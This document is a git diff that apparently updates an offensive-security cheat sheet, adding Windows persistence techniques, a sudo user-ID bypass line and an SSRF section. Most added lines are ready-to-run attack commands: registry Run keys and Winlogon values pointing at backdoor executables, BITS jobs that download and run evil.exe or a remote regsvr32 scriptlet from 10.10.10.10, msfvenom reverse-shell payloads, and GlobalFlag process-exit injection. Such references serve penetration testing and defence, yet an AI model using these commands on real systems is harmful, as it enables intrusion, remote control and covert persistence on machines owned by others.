diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 8be1b6f..b3768b0 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -16,6 +16,7 @@ - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) + - [HockeyApp API Token](#hockeyapp-api-token) - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) @@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token= By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token @@ -125,4 +133,5 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) -* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) \ No newline at end of file +* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) +* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index acc6b89..5dad4e3 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -470,6 +470,7 @@ Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/maste # If you have a full TTY, you can exploit it like this sudo -u#-1 /bin/bash +sudo -u#4294967295 id ``` ## GTFOBins diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 963d807..c1fc028 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -6,14 +6,17 @@ * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) * [Userland](#userland) - * [Registry](#registry) + * [Registry HKCU](#registry-hkcu) * [Startup](#startup) * [Scheduled Task](#scheduled-task) + * [BITS Jobs](#bits-jobs) * [Serviceland](#serviceland) * [IIS](#iis) * [Windows Service](#windows-service) * [Elevated](#elevated) - * [HKLM](#hklm) + * [Registry HKLM](#registry-hklm) + * [Winlogon Helper DLL](#) + * [GlobalFlag](#) * [Services](#services) * [Scheduled Task](#scheduled-task) * [Binary Replacement](#binary-replacement) @@ -65,6 +68,15 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +``` + Using SharPersist ```powershell @@ -110,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` + +### BITS Jobs + +```powershell +bitsadmin /create backdoor +bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe" + +# v1 +bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL +bitsadmin /SetMinRetryDelay "backdoor" 60 +bitsadmin /resume backdoor + +# v2 - exploit/multi/script/web_delivery +bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll" +bitsadmin /resume backdoor +``` + ## Serviceland ### IIS @@ -132,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som ## Elevated -### HKLM +### Registry HKLM Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. @@ -141,6 +170,41 @@ Value name: Backdoor Value data: C:\Windows\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +``` + +#### Winlogon Helper DLL + +> Run executable during Windows logon + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll + +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force +``` + + +#### GlobalFlag + +> Run executable after notepad is killed + +```powershell +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" +``` + + ### Services Create a service that will start automatically or on-demand. @@ -176,6 +240,8 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D | Display Switcher | C:\Windows\System32\DisplaySwitch.exe | | App Switcher | C:\Windows\System32\AtBroker.exe | +In Metasploit : `use post/windows/manage/sticky_keys` + #### Binary Replacement on Windows 10+ Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. @@ -217,4 +283,9 @@ Enter-PSSession -ComputerName -Credential \Administr * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) * [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) -* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) \ No newline at end of file +* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) +* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md) +* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) +* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) +* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) +* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 964f300..84bfa50 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -407,6 +407,14 @@ gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20- gopher://127.0.0.1:6379/_save ``` +## SSRF exploiting PDF file + +Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) + +```powershell + +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)